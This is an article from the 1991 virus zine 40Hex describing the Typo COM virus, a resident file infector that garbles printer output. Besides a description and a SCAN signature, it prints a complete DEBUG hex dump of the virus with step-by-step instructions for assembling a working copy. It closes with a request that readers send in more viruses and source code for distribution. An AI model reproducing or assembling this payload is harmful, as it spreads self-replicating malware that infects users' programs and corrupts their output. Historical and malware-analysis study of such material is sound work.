40Hex Issue 4 December 1991 The Typo COM Virus The Typo Virus comes in 2 forms - a boot sector infector, and a COM file infector. This version is the COM version. The effective length of the virus is 867 bytes, and it only infects COM files. Typo stays resident, and can infect files whether they are run or not, from my experience. Typo isn't a destructive virus, but it does garble any output to the parallel ports, by exchanging certain letters with others that sound similar, and by transposing numbers. Sometimes it replaces one number with an entirely different number. Typo is believed to have originated in Israel, because some Hebrew letters are changed when it is active, and it was isolated in that country. Typo is easily detected by SCAN, and the scan string is "A1 58 00 2E 89 84 99 FE 26 A1 5A 00" in lines 400 and 410 of the hex dump, below. To assemble TYPO.COM, cut out the following hex, and name the resulting file TYPO. Then, issue the command DEBUG < TYPO and you will have a working version of the virus. --DecimatoR ----------------------------Cut Here------------------------------ n typo.com e 0100 E9 18 00 31 E9 FF FF 2A 2E 43 4F 4D 00 CD 20 20 e 0110 56 31 05 00 CE CD 20 00 59 00 00 53 51 52 1E 06 e 0120 56 0E 1F E8 00 00 5E 83 EE 24 FF 4C 16 83 7C 16 e 0130 03 75 05 C7 44 16 5B 00 E8 85 02 BA D0 00 B4 1A e 0140 CD 21 8A 44 0B 88 44 12 8B 44 0C 89 44 13 B4 2A e 0150 CD 21 F6 C2 01 75 1F 8B D6 81 C2 05 00 33 C9 B4 e 0160 4E CD 21 72 11 E8 2C 00 8B D6 81 C2 05 00 33 C9 e 0170 B4 4F CD 21 73 EF 8A 44 12 A2 00 01 8B 44 13 A3 e 0180 01 01 BA 80 00 B4 1A CD 21 5E 07 1F 5A 59 5B B8 e 0190 00 01 FF E0 B8 01 43 BA EE 00 33 C9 CD 21 B8 02 e 01A0 3D BA EE 00 CD 21 73 03 E9 B4 00 89 44 10 8B D8 e 01B0 B4 3F B9 03 00 8B D6 81 C2 0B 00 CD 21 80 7C 0B e 01C0 E9 75 30 8B 54 0C 83 EA 16 33 C9 B8 00 42 8B 5C e 01D0 10 CD 21 8B D8 B4 3F B9 02 00 8B D6 81 C2 0E 00 e 01E0 8B 5C 10 CD 21 72 65 3D 00 00 74 07 8B 44 0E 3B e 01F0 04 74 59 33 C9 33 D2 B8 02 42 8B 5C 10 CD 21 72 e 0200 4B 2D 03 00 89 44 03 8B 5C 10 B4 40 B9 63 03 90 e 0210 8B D6 81 C2 00 00 CD 21 72 32 83 44 03 19 33 D2 e 0220 33 C9 B8 00 42 8B 5C 10 CD 21 72 20 8B 5C 10 B4 e 0230 40 B9 03 00 8B D6 81 C2 02 00 CD 21 B8 01 57 8B e 0240 5C 10 8B 0E E6 00 8B 16 E8 00 CD 21 8B 5C 10 B4 e 0250 3E CD 21 B8 01 43 BA EE 00 8A 0E E5 00 CD 21 C3 e 0260 FB 80 FC DD 75 03 8A C4 CF 80 FC 00 74 6C EA 2E e 0270 E8 00 F0 C7 84 C7 84 59 00 60 31 32 33 34 35 36 e 0280 37 38 39 30 2D 3D 5C 7E 21 40 23 24 25 5E 26 2A e 0290 28 29 5F 2B 7C 71 77 65 72 74 79 75 69 6F 70 5B e 02A0 5D 5B 61 73 64 66 67 68 6A 6B 6C 3B 27 7A 78 63 e 02B0 76 62 6E 6D 2C 2E 2F 51 57 45 52 54 59 55 49 4F e 02C0 50 7B 7D 41 53 44 46 47 48 4A 4B 4C 3A 22 3B 5A e 02D0 58 43 56 42 4E 4D 3C 3E 3F 2E 56 E8 00 00 5E 9C e 02E0 2E FF 5C 91 53 06 BB 40 00 8E C3 26 8B 1E 6C 00 e 02F0 53 2E 2B 5C 95 83 FB 02 5B 2E 89 5C 95 7F 39 2E e 0300 87 5C 97 2E 2B 5C 97 F7 DB 2E 3B 5C 99 7C 29 2E e 0310 FF 4C 99 2E 83 7C 99 06 74 06 2E C7 44 99 5B 00 e 0320 83 EE 65 51 B9 61 00 2E 3A 04 74 07 46 E2 F8 59 e 0330 EB 06 90 59 2E 8A 44 01 07 5B 5E CA 02 00 80 FC e 0340 00 74 05 80 FC 4C 75 19 E8 24 00 2E 8B 16 2C 00 e 0350 8E C2 BB 00 00 B4 4A CD 21 BA 1D 00 83 C2 01 B4 e 0360 31 EA 60 14 73 02 B8 00 4C EB D3 3F 14 73 02 51 e 0370 57 56 06 E8 00 00 5E 56 BF 00 01 B9 DE 00 2E 8A e 0380 84 EA FE 2E 88 05 46 47 E2 F4 5E 33 C9 8E C1 2E e 0390 8B 4C EC 26 89 0E 84 00 2E 8B 4C EE 26 89 0E 86 e 03A0 00 2E 8B 4C F5 26 89 0E 80 00 2E 8B 4C F7 26 89 e 03B0 0E 82 00 B9 00 01 26 89 0E 58 00 07 5E 5F 59 C3 e 03C0 50 32 C0 B4 DD CD 16 3A C4 75 02 58 C3 53 56 06 e 03D0 8B 54 16 E8 00 00 5E 53 06 BB 40 00 8E C3 26 8B e 03E0 1E 6C 00 2E 89 9C 9D FE 2E 89 9C 9F FE 07 5B 89 e 03F0 94 A1 FE 33 C0 8E C0 26 A1 84 00 2E 89 44 8C 26 e 0400 A1 86 00 2E 89 44 8E 26 A1 58 00 2E 89 84 99 FE e 0410 26 A1 5A 00 2E 89 84 9B FE 26 A1 80 00 2E 89 44 e 0420 95 26 A1 82 00 2E 89 44 97 FA 0E 26 8F 06 86 00 e 0430 26 89 36 84 00 26 81 2E 84 00 98 00 0E 26 8F 06 e 0440 82 00 26 89 36 80 00 26 83 2E 80 00 70 0E 26 8F e 0450 06 5A 00 26 89 36 58 00 26 81 2E 58 00 76 01 FB e 0460 07 5E 5B 58 C3 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A rcx 464 w q --------------------------Cut Here Too----------------------------- Notice to all: 40Hex is always looking for new viruses to do write ups on, and new source code to distribute. If you have a copy of a rare virus, and/or viral source code, please send it to Digital Warfare BBS, at 717-367-3501. We'll be happy to give you the credit for donating it - IF you want us to. ;) ---Dec